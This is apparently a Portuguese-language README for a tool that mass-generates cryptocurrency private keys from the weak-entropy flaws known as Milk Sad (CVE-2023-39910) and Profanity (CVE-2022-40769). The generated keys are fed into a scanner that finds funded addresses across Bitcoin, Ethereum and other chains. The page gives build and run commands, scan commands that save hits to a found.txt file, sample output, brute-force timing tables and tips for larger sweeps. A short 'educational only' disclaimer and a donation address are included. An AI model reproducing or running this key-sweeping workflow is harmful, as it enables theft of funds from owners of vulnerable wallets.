
DONATE: bc1qps62cyk9f9unmdkc9k3ccj9e2h8ywfhg2j53ec
Construído com ❤️ para a comunidade de pesquisa cripto.
DESCRIÇÃO: Esta ferramenta gera chaves privadas a partir de duas vulnerabilidades críticas que afetaram carteiras de criptomoedas. Ela cria arquivos TXT com chaves privadas hexadecimais (64 caracteres = 256 bits) que podem ser alimentadas no AllChainScanner para geração de endereços e verificação de saldos.
🔴 GERA CHAVES A PARTIR DE 2 GRANDES VULNERABILIDADES CRIPTO!
CVE-2023-39910 (Libbitcoin Explorer / Milk Sad)
CVE-2022-40769 (Profanity - Gerador de Endereços Vanity Ethereum)
Passo 1: Gerar chaves ./keygen 0 1000000 keys.txt
Passo 2: Arquivos de saída criados
Passo 3: Alimentar no AllChainScanner ./AllChainScanner -f libbitcoin_keys.txt -o found.txt -t all ./AllChainScanner -f profanity_keys.txt -o found.txt -t all
Passo 4: O scanner converte hex de 64 caracteres para:
COMPILAR: g++ -O3 -march=native -o keygen keygen.cpp -std=c++17
USO: ./keygen [seed_inicial] [seed_final] [saida.txt]
PARÂMETROS: seed_inicial Semente inicial (padrão: 0) seed_final Semente final (padrão: 1000000) saida.txt Nome do arquivo de saída (padrão: keys.txt)
EXEMPLOS: ./keygen 0 1000000 keys.txt → Gera 1.000.000 chaves (0 a 999.999)
./keygen 1000000 2000000 keys.txt → Gera 1.000.000 chaves (1.000.000 a 1.999.999)
./keygen 0 10000000 keys.txt → Gera 10.000.000 chaves (leva ~1-2 minutos)
Arquivo: libbitcoin_.txt
Arquivo: profanity_.txt
LINK: https://github.com/ethicbrudhack/AllChainScanner-Bitcoin-eth-zcash-etc..-
Gerar chaves: ./keygen 0 10000000 keys.txt
Escanear chaves Bitcoin: ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t P2PKH ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t P2SH ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t bech32
Escanear chaves Ethereum: ./AllChainScanner -f profanity_keys.txt -o eth_found.txt -t ethereum
Escanear todas as moedas: ./AllChainScanner -f libbitcoin_keys.txt -o all_found.txt -t HEX
Todas as chaves geradas funcionam com: ✅ Bitcoin (1..., 3..., bc1...) ✅ Ethereum (0x...) ✅ Litecoin (L..., M...) ✅ Dogecoin (D...) ✅ Dash (X...) ✅ Zcash (t1..., t3...) ✅ Bitcoin Cash (bitcoincash:...) ✅ BNB Smart Chain (0x...) ✅ Polygon (0x...) ✅ Avalanche C-Chain (0x...)
CVE-2023-39910 (Milk Sad):
CVE-2022-40769 (Profanity):
*Baseado em:
Executando: ./keygen 0 5 keys.txt
Intervalo: 0 - 5 Número de chaves: 5 Arquivo de saída: keys.txt
[1] CVE-2023-39910 (Libbitcoin/Milk Sad) - gerando... 5/5 | 2500000 chaves/s Salvo em: libbitcoin_keys.txt (0,0s)
[2] CVE-2022-40769 (Profanity) - gerando... 5/5 | 2500000 chaves/s Salvo em: profanity_keys.txt (0,0s)
Use sempre ambos os geradores
Gere intervalos grandes
Combine com outros scanners
Mantenha found.txt seguro
⚠️ ESTA FERRAMENTA GERA CHAVES PRIVADAS REAIS! ⚠️ TESTE APENAS EM ENDEREÇOS QUE VOCÊ POSSUI! ⚠️ NÃO USE PARA ATIVIDADES ILEGAIS! ⚠️ MANTENHA FOUND.TXT SEGURO - CONTÉM CHAVES PRIVADAS!
As chaves geradas por esta ferramenta:
CVE-2023-39910: https://nvd.nist.gov/vuln/detail/CVE-2023-39910 CVE-2022-40769: https://nvd.nist.gov/vuln/detail/CVE-2022-40769 Milk Sad: https://milksad.info Profanity: https://github.com/1r0n1c/profanity AllChainScanner: https://github.com/ethicbrudhack/AllChainScanner-Bitcoin-eth-zcash-etc..-
Licença MIT - Apenas para fins educacionais e de pesquisa
============================================================
| Gerador | Velocidade (chaves/s) | Tempo 1M chaves | Tempo 10M chaves |
|---|
| CVE-2023-39910 | ~2.000.000 | ~0,5 seg | ~5 seg |
| CVE-2022-40769 | ~2.000.000 | ~0,5 seg | ~5 seg |
| Combinado | ~1.000.000 | ~1 seg | ~10 seg |
| Vulnerabilidade | Entropia | Possibilidades | Tempo para Força Bruta* |
|---|
| CVE-2023-39910 | 32 bits | 4,29 × 10^9 | ~8 segundos (24 palavras) |
| CVE-2023-39910 | 32 bits | 4,29 × 10^9 | ~12 minutos (BIP32) |
| CVE-2022-40769 | 32 bits | 4,29 × 10^9 | ~8 segundos (24 palavras) |
| CVE-2022-40769 | 32 bits | 4,29 × 10^9 | ~12 minutos (BIP32) |
| 256 bits REAL | 256 bits | 1,16 × 10^77 | Impossível |